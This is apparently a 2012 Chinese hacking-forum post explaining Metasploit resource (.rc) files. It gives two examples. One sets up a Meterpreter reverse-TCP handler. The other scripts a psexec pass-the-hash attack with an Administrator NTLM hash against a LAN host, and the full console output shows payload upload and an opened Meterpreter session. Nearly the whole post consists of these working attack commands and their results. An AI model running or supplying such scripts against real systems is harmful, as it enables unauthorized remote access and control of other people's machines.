切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
182 METASPLOIT rc 文件[复制链接]
发表于 2012-10-2 16:01:10 | 显示全部楼层 |!read_mode!
什么事RC文件,一个不错的快捷运行metasploit的东西
WebSploit 和 175 插队 metasploit智能破解 就是用RC文件来操作METASPLOIT
一个例子:


  1. root@bt:~# touch meterpreter.rc
  2. root@bt:~# echo use exploit/multi/handler >> meterpreter.rc
  3. root@bt:~# echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
  4. root@bt:~# echo set LHOST 192.168.1.184 >> meterpreter.rc
  5. root@bt:~# echo set ExitOnSession false >> meterpreter.rc
  6. root@bt:~# echo exploit -j -z >> meterpreter.rc
  7. root@bt:~# cat meterpreter.rc
  8. use exploit/multi/handler
  9. set PAYLOAD windows/meterpreter/reverse_tcp
  10. set LHOST 192.168.1.184
  11. set ExitOnSession false
  12. exploit -j -z
复制代码
我们写了一个meterpreter.rc文件 运行它
  1. root@bt:~# msfconsole -r meterpreter.rc


  2.        =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
  3. + -- --=[ 787 exploits - 425 auxiliary - 128 post
  4. + -- --=[ 238 payloads - 27 encoders - 8 nops
  5.        =[ svn r14551 updated yesterday (2012.01.14)

  6. resource> use exploit/multi/handler
  7. resource> set PAYLOAD windows/meterpreter/reverse_tcp
  8. PAYLOAD => windows/meterpreter/reverse_tcp
  9. resource> set LHOST 192.168.1.184
  10. LHOST => 192.168.1.184
  11. resource> set ExitOnSession false
  12. ExitOnSession => false
  13. resource> exploit -j -z
  14. [*] Handler binding to LHOST 0.0.0.0
  15. [*] Started reverse handler
  16. [*] Starting the payload handler...
复制代码
看这个文件:
  1. use exploit windows/smb/psexec
  2. set PAYLOAD windows/meterpreter/reverse_tcp
  3. setg LHOST 192.168.1.182
  4. set RHOST 192.168.1.230
  5. set SMBPass aad3b435b51404eeaad3b435b51404ee:49e02f1338d4b2bf743beeb97aee524d
  6. set SMBUser Administrator
  7. exploit
复制代码

运行他 两个方法:
1.:



  1. msfconsole -r /root/2011-03-21_acme/192.168/1/230/230_psexec.rc
复制代码


2.:
  1. msf> resource /root/2011-03-21_acme/192.168/1/230/230_psexec.rc
复制代码


结果:
  1. root@bt:~# msfconsole -r /root/2011-03-21_acme/192.168/1/230/230_psexec.rc

  2.                 __.                       .__.        .__. __.
  3.   _____   _____/  |______    ____________ |  |   ____ |__|/  |_
  4. /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
  5. |  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
  6. |__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
  7.       \/     \/          \/     \/ |__|


  8.        =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
  9. + -- --=[ 653 exploits - 343 auxiliary
  10. + -- --=[ 216 payloads - 27 encoders - 8 nops
  11.        =[ svn r11970 updated 5 days ago (2011.03.15)

  12. resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> use windows/smb/psexec
  13. resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
  14. PAYLOAD => windows/meterpreter/reverse_tcp
  15. resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> setg LHOST 192.168.1.182
  16. LHOST => 192.168.1.182
  17. resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set RHOST 192.168.1.230
  18. RHOST => 192.168.1.230
  19. resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set SMBPass aad3b435b51404eeaad3b435b51404ee:49e02f1338d4b2bf743beeb97aee524d
  20. SMBPass => aad3b435b51404eeaad3b435b51404ee:49e02f1338d4b2bf743beeb97aee524d
  21. resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set SMBUser Administrator
  22. SMBUser => Administrator
  23. resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> exploit
  24. [*] Started reverse handler on 192.168.1.182:4444
  25. [*] Connecting to the server...
  26. [*] Authenticating to 192.168.1.230:445|WORKGROUP as user 'Administrator'...
  27. [*] Uploading payload...
  28. [*] Created \TwLkuthH.exe...
  29. [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.230[\svcctl] ...
  30. [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.230[\svcctl] ...
  31. [*] Obtaining a service manager handle...
  32. [*] Creating a new service (dcZDWuwa - "MluCkfMYLQRNHpqECJiJY")...
  33. [*] Closing service handle...
  34. [*] Opening service...
  35. [*] Starting the service...
  36. [*] Removing the service...
  37. [*] Sending stage (749056 bytes) to 192.168.1.230
  38. [*] Closing service handle...
  39. [*] Deleting \TwLkuthH.exe...
  40. [*] Meterpreter session 1 opened (192.168.1.182:4444 -> 192.168.1.230:49305) at Sun Mar 20 23:45:20 +0000 2011

  41. meterpreter >
复制代码



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-21 08:25

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部